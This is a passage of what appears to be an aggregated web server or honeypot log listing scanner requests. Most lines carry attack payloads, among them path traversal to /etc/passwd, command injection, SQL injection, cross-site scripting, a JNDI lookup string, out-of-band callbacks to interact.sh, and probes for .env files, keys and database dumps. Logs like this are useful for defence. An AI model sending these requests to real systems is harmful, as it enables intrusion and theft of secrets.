HTTP/1.1 |
1 | GET | /check_mk/login.py |
HTTP/1.1 |
1 | GET | /chkisg.htm%253FSip%253D1.1.1.1%2520%257C%2520cat%2520%252Fetc%252Fpasswd |
HTTP/1.1 |
1 | GET | /chpstrt.php?chppath=Home |
HTTP/1.1 |
1 | GET | /classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00 |
HTTP/1.1 |
3 | GET | /client/.env.local |
HTTP/1.1 |
3 | GET | /client/.env.production |
HTTP/1.1 |
3 | GET | /client/.env.staging |
HTTP/1.1 |
3 | GET | /client/.env |
HTTP/1.1 |
1 | GET | /client/ |
HTTP/1.1 |
1 | GET | /client_secrets.json |
HTTP/1.1 |
1 | GET | /clientaccesspolicy.xml |
HTTP/1.1 |
1 | GET | /cloud-config.yml |
HTTP/1.1 |
1 | GET | /cloud/ |
HTTP/1.1 |
1 | GET | /clusterList |
HTTP/1.1 |
1 | GET | /clusters/local |
HTTP/1.1 |
1 | GET | /cms/author_posts.php?author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL--%20-&p_id=1 |
HTTP/1.1 |
1 | GET | /cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
2 | GET | /cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1 |
HTTP/1.1 |
1 | GET | /cobbler/ |
HTTP/1.1 |
2 | GET | /code?dag_id=example_passing_params_via_test_command |
HTTP/1.1 |
1 | GET | /command.cgi?cat%20/etc/passwd |
HTTP/1.1 |
1 | GET | /command/prima-factory.cgi |
HTTP/1.1 |
2 | GET | /comment/api/index.php?gid=1&page=2&rlist[]=@ %27,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(999999999)))),@ %27`` |
HTTP/1.1 |
2 | GET | /common/admin/Calendar/Telerik.Web.UI.DialogHandler.aspx?dp=1 |
HTTP/1.1 |
1 | GET | /common/admin/Jobs2/Telerik.Web.UI.DialogHandler.aspx?dp=1 |
HTTP/1.1 |
2 | GET | /common/admin/PhotoGallery2/Telerik.Web.UI.DialogHandler.aspx?dp=1 |
HTTP/1.1 |
1 | GET | /common/download/resource?resource=/profile/../../../../Windows/win.ini |
HTTP/1.1 |
1 | GET | /common/download/resource?resource=/profile/../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /common_page/login.html |
HTTP/1.1 |
2 | GET | /community/?foro=signin&redirect_to=https[:]//interact[.]sh/ |
HTTP/1.1 |
1 | GET | /compliancepolicies.inc.php?search=True&searchColumn=policyName&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+&searchOption=contains |
HTTP/1.1 |
1 | GET | /compliancepolicyelements.inc.php?search=True&searchColumn=elementName&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchOption=contains |
HTTP/1.1 |
2 | GET | /components/com_moofaq/includes/file_includer.php?file=/../../../../../etc/passwd&gzip=0 |
HTTP/1.1 |
1 | GET | /components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00 |
HTTP/1.1 |
1 | GET | /composer.lock |
HTTP/1.1 |
1 | GET | /composer/send_email?to=GOLf@xEFI&url=http[:]// |
HTTP/1.1 |
2 | GET | /computeMetadata/v1/project/ |
HTTP/1.1 |
1 | GET | /concrete5/index.php/install |
HTTP/1.1 |
1 | GET | /conditions |
HTTP/1.1 |
2 | GET | /conf/nginx.conf |
HTTP/1.1 |
1 | GET | /conf |
HTTP/1.1 |
3 | GET | /config.env |
HTTP/1.1 |
3 | GET | /config.js |
HTTP/1.1 |
4 | GET | /config.json |
HTTP/1.1 |
1 | GET | /config.php.bak |
HTTP/1.1 |
1 | GET | /config.rb |
HTTP/1.1 |
1 | GET | /config/ |
HTTP/1.1 |
1 | GET | /config/cam_portal.cgi |
HTTP/1.1 |
3 | GET | /config/config.js |
HTTP/1.1 |
3 | GET | /config/config.json |
HTTP/1.1 |
1 | GET | /config/configuration.yml |
HTTP/1.1 |
1 | GET | /config/database.yml |
HTTP/1.1 |
1 | GET | /config/environment.rb |
HTTP/1.1 |
1 | GET | /config/error_log |
HTTP/1.1 |
3 | GET | /config/initializers/secret_token.rb |
HTTP/1.1 |
2 | GET | /config/packages/security.yaml |
HTTP/1.1 |
1 | GET | /config/pw_snmp.html |
HTTP/1.1 |
3 | GET | /config/secrets.yml |
HTTP/1.1 |
1 | GET | /config/security.yml |
HTTP/1.1 |
1 | GET | /config/settings.yml |
HTTP/1.1 |
1 | GET | /configprops |
HTTP/1.1 |
1 | GET | /configuration.php-dist |
HTTP/1.1 |
1 | GET | /configurations/config_default |
HTTP/1.1 |
2 | GET | /configurations |
HTTP/1.1 |
1 | GET | /configure/app/landing/welcome-srm-va.html |
HTTP/1.1 |
1 | GET | /confluence |
HTTP/1.1 |
2 | GET | /conn.php.bak |
HTTP/1.1 |
1 | GET | /connections |
HTTP/1.1 |
1 | GET | /console-selfservice/SelfService.do |
HTTP/1.1 |
3 | GET | /console/base/config.json |
HTTP/1.1 |
1 | GET | /console/images/%25252e%25252e%25252fconsole.portal?_nfpb=true&_pageLabel&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http[:]//') |
HTTP/1.1 |
3 | GET | /console/payments/config.json |
HTTP/1.1 |
4 | GET | /console |
HTTP/1.1 |
1 | GET | /contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E |
HTTP/1.1 |
2 | GET | /containers/ |
HTTP/1.1 |
2 | GET | /contao/%2522%253e%253Cscript%253Ealert%2528document.domain%2529%253C%252Fscript%253E |
HTTP/1.1 |
1 | GET | /contao/login |
HTTP/1.1 |
1 | GET | /content../.git/config |
HTTP/1.1 |
1 | GET | /contrib/acog/print_form.php?formname=../../../etc/passwd%00 |
HTTP/1.1 |
1 | GET | /controlcenter.php?dir=%2Fetc&ffile=passwd&opmod=open&opt=contents/Files |
HTTP/1.1 |
2 | GET | /controller/config |
HTTP/1.1 |
2 | GET | /controller/registry-clients |
HTTP/1.1 |
1 | GET | /controllers/ |
HTTP/1.1 |
2 | GET | /core-cloud-config.yml |
HTTP/1.1 |
1 | GET | /core/auth/login/ |
HTTP/1.1 |
1 | GET | /cors_proxy/https[:]//www[.]interact[.]sh |
HTTP/1.1 |
1 | GET | /costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. |
HTTP/1.1 |
2 | GET | /counters |
HTTP/1.1 |
1 | GET | /cp/Shares?protocol=webaccess&user&v=2.3 |
HTTP/1.1 |
2 | GET | /crea_modelli.php?T_PHPR_DB_HOST=localhost&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_DB_PORT=5432&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno=2021&anno_modello=2021&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ef9xkbujgt24&fonte_dati_conn=attuali&form_availability_calendar_template=1&id_sessione&lingua_modello=en |
HTTP/1.1 |
1 | GET | /creaprezzi.php?prezzoperiodo4=%22><script>javascript:alert(%27XSS%27)</script> |
HTTP/1.1 |
1 | GET | /credentials.db |
HTTP/1.1 |
1 | GET | /credentials.json |
HTTP/1.1 |
3 | GET | /crm/.env.local |
HTTP/1.1 |
3 | GET | /crm/.env.production |
HTTP/1.1 |
3 | GET | /crm/.env.staging |
HTTP/1.1 |
3 | GET | /crm/.env |
HTTP/1.1 |
3 | GET | /cron/.env.local |
HTTP/1.1 |
3 | GET | /cron/.env.production |
HTTP/1.1 |
3 | GET | /cron/.env.staging |
HTTP/1.1 |
3 | GET | /cron/.env |
HTTP/1.1 |
1 | GET | /crossdomain.xml |
HTTP/1.1 |
2 | GET | /crx/de/index.jsp |
HTTP/1.1 |
1 | GET | /crx/de/setPreferences.jsp;%250A.html?keymap=<svg/onload=confirm(document.domain)>//a&language=en |
HTTP/1.1 |
1 | GET | /crx/explorer/nodetypes/index.jsp |
HTTP/1.1 |
1 | GET | /crx/explorer/ui/search.jsp |
HTTP/1.1 |
1 | GET | /crx/packmgr/index.jsp |
HTTP/1.1 |
1 | GET | /cs/Satellite?WemUI=qqq%27}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor |
HTTP/1.1 |
1 | GET | /cs/Satellite?WemUI=qqq%27}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest |
HTTP/1.1 |
1 | GET | /cs/Satellite?cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset |
HTTP/1.1 |
2 | GET | /cs/Satellite?destpage=\"<h1xxx\"><script>alert(document.domain)</script>&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError |
HTTP/1.1 |
1 | GET | /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots |
HTTP/1.1 |
3 | GET | /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences |
HTTP/1.1 |
2 | GET | /cs/idcplg?FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&IdcService=GET_SEARCH_RESULTS&PageName=indext&PageTitle=OO&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&ResultCount=20&ResultTemplate=StandardResults&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>&SortField=dInDate&SortOrder=Desc&dSecurityGroup |
HTTP/1.1 |
1 | GET | /css/eonweb.css |
HTTP/1.1 |
1 | GET | /css_parser.php?css=css_parser.php |
HTTP/1.1 |
3 | GET | /current/.env.local |
HTTP/1.1 |
3 | GET | /current/.env.production |
HTTP/1.1 |
3 | GET | /current/.env.staging |
HTTP/1.1 |
3 | GET | /current/.env |
HTTP/1.1 |
1 | GET | /currentsetting.htm |
HTTP/1.1 |
1 | GET | /custom/%253Cimg%2520src=x%2520onerror=alert%28document.domain%29%253E |
HTTP/1.1 |
2 | GET | /cxcum/ |
HTTP/1.1 |
1 | GET | /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C |
HTTP/1.1 |
1 | GET | /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ |
HTTP/1.1 |
2 | GET | /dana-na/auth/url_2/welcome.cgi |
HTTP/1.1 |
1 | GET | /dana-na/auth/url_3/welcome.cgi |
HTTP/1.1 |
1 | GET | /dana-na/auth/url_default/welcome.cgi |
HTTP/1.1 |
1 | GET | /dana-na/nc/nc_gina_ver.txt |
HTTP/1.1 |
1 | GET | /darkstat/ |
HTTP/1.1 |
1 | GET | /dashboard.html |
HTTP/1.1 |
2 | GET | /dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1 |
HTTP/1.1 |
3 | GET | /dashboard/ |
HTTP/1.1 |
1 | GET | /dashboard/auth/login/ |
HTTP/1.1 |
3 | GET | /dashboard/phpinfo.php |
HTTP/1.1 |
2 | GET | /dashboard/snapshot/%257B%257Bconstructor.constructor%28%2527alert%28document.domain%29%2527%29%28%29%257D%257D?orgId=1 |
HTTP/1.1 |
2 | GET | /dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- |
HTTP/1.1 |
1 | GET | /dashboardUser |
HTTP/1.1 |
1 | GET | /data.sql |
HTTP/1.1 |
1 | GET | /data/autosuggest-remote.php?q=\"><img%20src=x%20onerror=alert(1)> |
HTTP/1.1 |
2 | GET | /data/pbootcms.db |
HTTP/1.1 |
3 | GET | /database.yml |
HTTP/1.1 |
1 | GET | /dataservice/disasterrecovery/download/token/%252E%252E%252F%252E%252E%252F%252E%252E%252F%252Fetc%252Fpasswd |
HTTP/1.1 |
1 | GET | /dati/availability_tpl.php?num_app_tipo_richiesti1=%22><script>javascript:alert(%27XSS%27)</script> |
HTTP/1.1 |
2 | GET | /db.php.bak |
HTTP/1.1 |
2 | GET | /db.sql |
HTTP/1.1 |
1 | GET | /db/admin/system.users |
HTTP/1.1 |
1 | GET | /db/robomongo.json |
HTTP/1.1 |
2 | GET | /db/schema.rb |
HTTP/1.1 |
2 | GET | /db_backup.sql |
HTTP/1.1 |
1 | GET | /db_config.php.bak |
HTTP/1.1 |
1 | GET | /db_dump.php |
HTTP/1.1 |
2 | GET | /dbaas_monitor/login |
HTTP/1.1 |
2 | GET | /dbconsole/ |
HTTP/1.1 |
2 | GET | /dbdump.sql |
HTTP/1.1 |
1 | GET | /debug.seam |
HTTP/1.1 |
2 | GET | /debug/ |
HTTP/1.1 |
1 | GET | /debug/default/view.html |
HTTP/1.1 |
3 | GET | /debug/default/view?panel=config |
HTTP/1.1 |
1 | GET | /debug/default/view |
HTTP/1.1 |
1 | GET | /debug/pprof/ |
HTTP/1.1 |
2 | GET | /debug/vars |
HTTP/1.1 |
2 | GET | /default.htm |
HTTP/1.1 |
2 | GET | /default.php.bak |
HTTP/1.1 |
2 | GET | /default/en_US/frame.A100.html?sidebar=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd |
HTTP/1.1 |
2 | GET | /default/en_US/frame.html?content=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd |
HTTP/1.1 |
1 | GET | /default/showLogon.do |
HTTP/1.1 |
1 | GET | /deltaweb/hmi_login.asp |
HTTP/1.1 |
3 | GET | /demo/.env.local |
HTTP/1.1 |
3 | GET | /demo/.env.production |
HTTP/1.1 |
3 | GET | /demo/.env.staging |
HTTP/1.1 |
3 | GET | /demo/.env |
HTTP/1.1 |
1 | GET | /demo/api/logout?redirect_to=/asdf%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /demo/file/../../../../../../../../etc/passwd%2500filename.mp4/chunk.m3u8?nimblesessionid=1484448 |
HTTP/1.1 |
1 | GET | /descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample |
HTTP/1.1 |
1 | GET | /desktop.ini |
HTTP/1.1 |
1 | GET | /desktop/container/landing.jsp?locale=en_US |
HTTP/1.1 |
1 | GET | /desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx?dp=1 |
HTTP/1.1 |
2 | GET | /desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx?dp=1 |
HTTP/1.1 |
3 | GET | /dev/.env.local |
HTTP/1.1 |
3 | GET | /dev/.env.production |
HTTP/1.1 |
3 | GET | /dev/.env.staging |
HTTP/1.1 |
3 | GET | /dev/.env |
HTTP/1.1 |
1 | GET | /dev/tests/functional/etc/config.xml.dist |
HTTP/1.1 |
1 | GET | /devel/iface/ |
HTTP/1.1 |
3 | GET | /develop/.env.local |
HTTP/1.1 |
3 | GET | /develop/.env.production |
HTTP/1.1 |
3 | GET | /develop/.env.staging |
HTTP/1.1 |
3 | GET | /develop/.env |
HTTP/1.1 |
1 | GET | /development.log |
HTTP/1.1 |
3 | GET | /development/.env.local |
HTTP/1.1 |
3 | GET | /development/.env.production |
HTTP/1.1 |
3 | GET | /development/.env.staging |
HTTP/1.1 |
3 | GET | /development/.env |
HTTP/1.1 |
1 | GET | /devices.inc.php?search=True&searchColumn=n.id&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchOption=contains |
HTTP/1.1 |
1 | GET | /dlibrary/null?library=null&oldfile=../../../../../../windows/win.ini |
HTTP/1.1 |
1 | GET | /dms/admin/accounts/payment_history.php?account_id=2%27 |
HTTP/1.1 |
1 | GET | /dms/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php |
HTTP/1.1 |
2 | GET | /dns-query?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB |
HTTP/1.1 |
1 | GET | /doc/CHANGELOG.txt |
HTTP/1.1 |
1 | GET | /doc/README.txt |
HTTP/1.1 |
2 | GET | /docker-cloud.yml |
HTTP/1.1 |
1 | GET | /docker-compose-dev.yml |
HTTP/1.1 |
1 | GET | /docker-compose.dev.yml |
HTTP/1.1 |
1 | GET | /docker-compose.override.yml |
HTTP/1.1 |
1 | GET | /docker-compose.prod.yml |
HTTP/1.1 |
1 | GET | /docker-compose.production.yml |
HTTP/1.1 |
1 | GET | /docker-compose.staging.yml |
HTTP/1.1 |
1 | GET | /docker-compose.yml |
HTTP/1.1 |
2 | GET | /docs/ |
HTTP/1.1 |
1 | GET | /docs/introduction.html |
HTTP/1.1 |
1 | GET | /documentation/login |
HTTP/1.1 |
1 | GET | /documentation |
HTTP/1.1 |
1 | GET | /domcfg.nsf |
HTTP/1.1 |
1 | GET | /dotAdmin/ |
HTTP/1.1 |
1 | GET | /download.php?file=../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /download.php?file=/etc/passwd |
HTTP/1.1 |
1 | GET | /download/C%253a%252fwindows%252fsystem.ini |
HTTP/1.1 |
1 | GET | /download/index.php?file=../../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /download?file=passwd&type=Files&working_dir=%2F../../../../../../../../../../../../../../../../../../../etc |
HTTP/1.1 |
1 | GET | /download?filename=../../../../../../../../etc/passwd&type=files |
HTTP/1.1 |
2 | GET | /downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg |
HTTP/1.1 |
1 | GET | /downloader/ |
HTTP/1.1 |
1 | GET | /dr/authentication/oauth2/oauth2login?error=%24%7Bjndi%3Aldap%3A%2F%2F%24%7BhostName%7D.%7D |
HTTP/1.1 |
1 | GET | /druid/index.html |
HTTP/1.1 |
1 | GET | /druid/login.html |
HTTP/1.1 |
2 | GET | /dump.sql |
HTTP/1.1 |
1 | GET | /dump |
HTTP/1.1 |
1 | GET | /dumpmdm.cmd |
HTTP/1.1 |
1 | GET | /dwr/index.html |
HTTP/1.1 |
1 | GET | /e/ViewImg/index.html?url=javascript:alert(1) |
HTTP/1.1 |
1 | GET | /e/ViewImg/index.html?url=javascript:alert(document.domain) |
HTTP/1.1 |
2 | GET | /eam/vib?id=/etc/issue |
HTTP/1.1 |
1 | GET | /eam/vib?id=C:\\Documents+and+Settings\\All+Users\\Application+Data\\VMware\\VMware+VirtualCenter\\vcdb.properties |
HTTP/1.1 |
2 | GET | /eam/vib?id=C:\\ProgramData\\VMware\\VMware+VirtualCenter\\vcdb.properties |
HTTP/1.1 |
1 | GET | /eam/vib?id=C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx\\vcdb.properties |
HTTP/1.1 |
2 | GET | /ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /editor_tools/module?params=filetype=images&type=files/admin\"><script>alert(document.domain)</script> |
HTTP/1.1 |
1 | GET | /elFinder/php/connector.minimal.php?cmd=mkfile&name=2LM9chQyv2MoMboick6OKt4mo7p[.]php:aaa&target=l1_Lw |
HTTP/1.1 |
1 | GET | /elfinder/php/connector.minimal.php?cmd=file&download=1&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64> |
HTTP/1.1 |
1 | GET | /elmah.axd |
HTTP/1.1 |
1 | GET | /elmah |
HTTP/1.1 |
1 | GET | /elocker_old/storage/ |
HTTP/1.1 |
1 | GET | /em/console/logon/logon |
HTTP/1.1 |
1 | GET | /email_passthrough.php?email_ID=1&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Finteract[.]sh&type=link |
HTTP/1.1 |
1 | GET | /emergency.php |
HTTP/1.1 |
1 | GET | /en-US/splunkd/__raw/services/server/info/server-info?output_mode=json |
HTTP/1.1 |
2 | GET | /enginemanager/ftu/welcome.htm |
HTTP/1.1 |
1 | GET | /enginemanager/server/logs/download?logName=../../../../../../../../etc/passwd&logSource=engine&logType=error |
HTTP/1.1 |
3 | GET | /env.backup |
HTTP/1.1 |
3 | GET | /env.config.js |
HTTP/1.1 |
3 | GET | /env.js |
HTTP/1.1 |
1 | GET | /env |
HTTP/1.1 |
1 | GET | /environment.rb |
HTTP/1.1 |
1 | GET | /equipbid/storage/ |
HTTP/1.1 |
1 | GET | /error.log |
HTTP/1.1 |
1 | GET | /error.txt |
HTTP/1.1 |
1 | GET | /error/error.log |
HTTP/1.1 |
2 | GET | /error3?data='alert('nuclei')//&msg=30 |
HTTP/1.1 |
1 | GET | /error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /error_log.txt |
HTTP/1.1 |
1 | GET | /error_log |
HTTP/1.1 |
1 | GET | /error |
HTTP/1.1 |
1 | GET | /errors.log |
HTTP/1.1 |
1 | GET | /errors.txt |
HTTP/1.1 |
1 | GET | /errors/errors.log |
HTTP/1.1 |
1 | GET | /errors_log |
HTTP/1.1 |
1 | GET | /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27\"user|s.\"1337\" |
HTTP/1.1 |
1 | GET | /etc....4.2.1....json |
HTTP/1.1 |
1 | GET | /etc.1.json |
HTTP/1.1 |
1 | GET | /etc.children....4.2.1....json |
HTTP/1.1 |
2 | GET | /etc.children.1.json |
HTTP/1.1 |
1 | GET | /etc.children.json/FNZ.css |
HTTP/1.1 |
2 | GET | /etc.children.json/FNZ.html |
HTTP/1.1 |
2 | GET | /etc.children.json/FNZ.ico |
HTTP/1.1 |
2 | GET | /etc.children.json/FNZ.png |
HTTP/1.1 |
1 | GET | /etc.children.json?FNZ.css |
HTTP/1.1 |
1 | GET | /etc.children.json?FNZ.html |
HTTP/1.1 |
1 | GET | /etc.children.json?FNZ.ico |
HTTP/1.1 |
1 | GET | /etc.children.json |
HTTP/1.1 |
1 | GET | /etc.json/FNZ.css |
HTTP/1.1 |
1 | GET | /etc.json/FNZ.html |
HTTP/1.1 |
2 | GET | /etc.json/FNZ.ico |
HTTP/1.1 |
1 | GET | /etc.json?FNZ.css |
HTTP/1.1 |
2 | GET | /etc.json?FNZ.ico |
HTTP/1.1 |
1 | GET | /etc.json |
HTTP/1.1 |
3 | GET | /etc/passwd |
HTTP/1.1 |
1 | GET | /etc |
HTTP/1.1 |
1 | GET | /events../.git/config |
HTTP/1.1 |
1 | GET | /events/EventRsvp.aspx |
HTTP/1.1 |
1 | GET | /example.htaccess |
HTTP/1.1 |
1 | GET | /examples/jsp/index.html |
HTTP/1.1 |
2 | GET | /examples/jsp/security/protected/index.jsp |
HTTP/1.1 |
1 | GET | /examples/servlets/index.html |
HTTP/1.1 |
1 | GET | /examples/servlets/servlet/CookieExample |
HTTP/1.1 |
1 | GET | /examples/websocket/index.xhtml |
HTTP/1.1 |
1 | GET | /explorer.html |
HTTP/1.1 |
1 | GET | /faces/javax.faces.resource/web.xml?loc=../WEB-INF |
HTTP/1.1 |
9 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /favicon.png |
HTTP/1.1 |
1 | GET | /fcgi-bin/echo |
HTTP/1.1 |
2 | GET | /fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails |
HTTP/1.1 |
2 | GET | /feed/ |
HTTP/1.1 |
1 | GET | /file=C:%255CWindows%255Cwin.ini |
HTTP/1.1 |
2 | GET | /fileman/index.html |
HTTP/1.1 |
1 | GET | /fileman/php/fileslist.php |
HTTP/1.1 |
1 | GET | /filemanager/ajax_calls.php?action=get_file&file=../../../../etc/passwd&preview_mode=text&sub_action=preview&title=source |
HTTP/1.1 |
2 | GET | /files.md5 |
HTTP/1.1 |
1 | GET | /files/ldap.debug.txt |
HTTP/1.1 |
1 | GET | /fileserver/test.txt |
HTTP/1.1 |
1 | GET | /filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html |
HTTP/1.1 |
1 | GET | /fiori |
HTTP/1.1 |
1 | GET | /flow/registries |
HTTP/1.1 |
1 | GET | /flyway |
HTTP/1.1 |
1 | GET | /fmlurlsvc/?url=https%3A%2F%2Fgoogle[.]com<Svg%2Fonload%3Dalert(document.domain)> |
HTTP/1.1 |
2 | GET | /folder_view.php |
HTTP/1.1 |
1 | GET | /forums/search/z--%3E%2522%253e%253C%252Fscript%253E%253Cscript%253Ealert%2528document.domain%2529%253C%252Fscript%253E/ |
HTTP/1.1 |
1 | GET | /fpui/jsp/index.jsp |
HTTP/1.1 |
1 | GET | /fpui/jsp/login.jsp |
HTTP/1.1 |
1 | GET | /free_time_failed.cgi?err_msg=<script>alert(document.domain)</script> |
HTTP/1.1 |
2 | GET | /front/privateLogin.jsp |
HTTP/1.1 |
1 | GET | /frontend/web/debug/default/view |
HTTP/1.1 |
3 | GET | /frontend_dev.php/$ |
HTTP/1.1 |
2 | GET | /ftpsync.settings |
HTTP/1.1 |
2 | GET | /fuel/login |
HTTP/1.1 |
1 | GET | /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 |
HTTP/1.1 |
2 | GET | /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27 |
HTTP/1.1 |
2 | GET | /fw.login.php |
HTTP/1.1 |
2 | GET | /fw/mindex.do?url=./WEB-INF/web.xml%3f |
HTTP/1.1 |
1 | GET | /gateway/routes |
HTTP/1.1 |
1 | GET | /gateway |
HTTP/1.1 |
1 | GET | /general/status.html |
HTTP/1.1 |
1 | GET | /getCorsFile?urlPath=file:///etc/passwd |
HTTP/1.1 |
1 | GET | /getFavicon?host=http[:]// |
HTTP/1.1 |
1 | GET | /ghost/preview |
HTTP/1.1 |
1 | GET | /git/notifyCommit?branches=2LNn60cx58l9l9q78Of71Bjp8l2&url=2LNn60cx58l9l9q78Of71Bjp8l2 |
HTTP/1.1 |
2 | GET | /gitlab/build_now%253C%252Fscript%253E%253Cscript%253Ealert%2528document.domain%2529%253C%252Fscript%253E |
HTTP/1.1 |
1 | GET | /global-protect/login.esp?user=j%22-alert(1)-%22x |
HTTP/1.1 |
3 | GET | /glpi/ |
HTTP/1.1 |
1 | GET | /glpi/ajax/telemetry.php |
HTTP/1.1 |
2 | GET | /glpi/files/ |
HTTP/1.1 |
2 | GET | /glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd |
HTTP/1.1 |
2 | GET | /glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 |
HTTP/1.1 |
1 | GET | /go/add-on/business-continuity/api/cipher.aes |
HTTP/1.1 |
2 | GET | /go/add-on/business-continuity/api/cruise_config |
HTTP/1.1 |
2 | GET | /go/add-on/business-continuity/api/plugin?folderName&pluginName=../../../etc/passwd |
HTTP/1.1 |
1 | GET | /go/admin/pipelines/create?group=defaultGroup |
HTTP/1.1 |
1 | GET | /go/auth/login |
HTTP/1.1 |
2 | GET | /goanywhere/auth/Login.xhtml |
HTTP/1.1 |
1 | GET | /goform/activate_process?akey&count=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&hostid&isv |
HTTP/1.1 |
1 | GET | /goform/goform_get_cmd_process?cmd=psw_fail_num_str |
HTTP/1.1 |
1 | GET | /goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E |
HTTP/1.1 |
1 | GET | /goforms/menu |
HTTP/1.1 |
2 | GET | /google-api-private-key.json |
HTTP/1.1 |
1 | GET | /google-services.json |
HTTP/1.1 |
1 | GET | /graph_realtime.php?action=init |
HTTP/1.1 |
1 | GET | /graphql?query={__typename} |
HTTP/1.1 |
1 | GET | /grid/console |
HTTP/1.1 |
1 | GET | /groovyconsole |
HTTP/1.1 |
1 | GET | /gsearch.php.en?prod='prompt document.domain// |
HTTP/1.1 |
1 | GET | /guestLogin.html?guest=1 |
HTTP/1.1 |
2 | GET | /h2-console/ |
HTTP/1.1 |
1 | GET | /h2-console/login.jsp |
HTTP/1.1 |
1 | GET | /haproxy?stats |
HTTP/1.1 |
1 | GET | /header.php.bak |
HTTP/1.1 |
1 | GET | /heapdump |
HTTP/1.1 |
1 | GET | /help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E |
HTTP/1.1 |
1 | GET | /hm/login.action |
HTTP/1.1 |
2 | GET | /home.html |
HTTP/1.1 |
1 | GET | /home |
HTTP/1.1 |
1 | GET | /hopfully404 |
HTTP/1.1 |
1 | GET | /horde/admin/user.php |
HTTP/1.1 |
1 | GET | /horde/imp/login.php |
HTTP/1.1 |
1 | GET | /horde/login.php |
HTTP/1.1 |
2 | GET | /horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00 |
HTTP/1.1 |
1 | GET | /horizon/auth/login/?next=/horizon/ |
HTTP/1.1 |
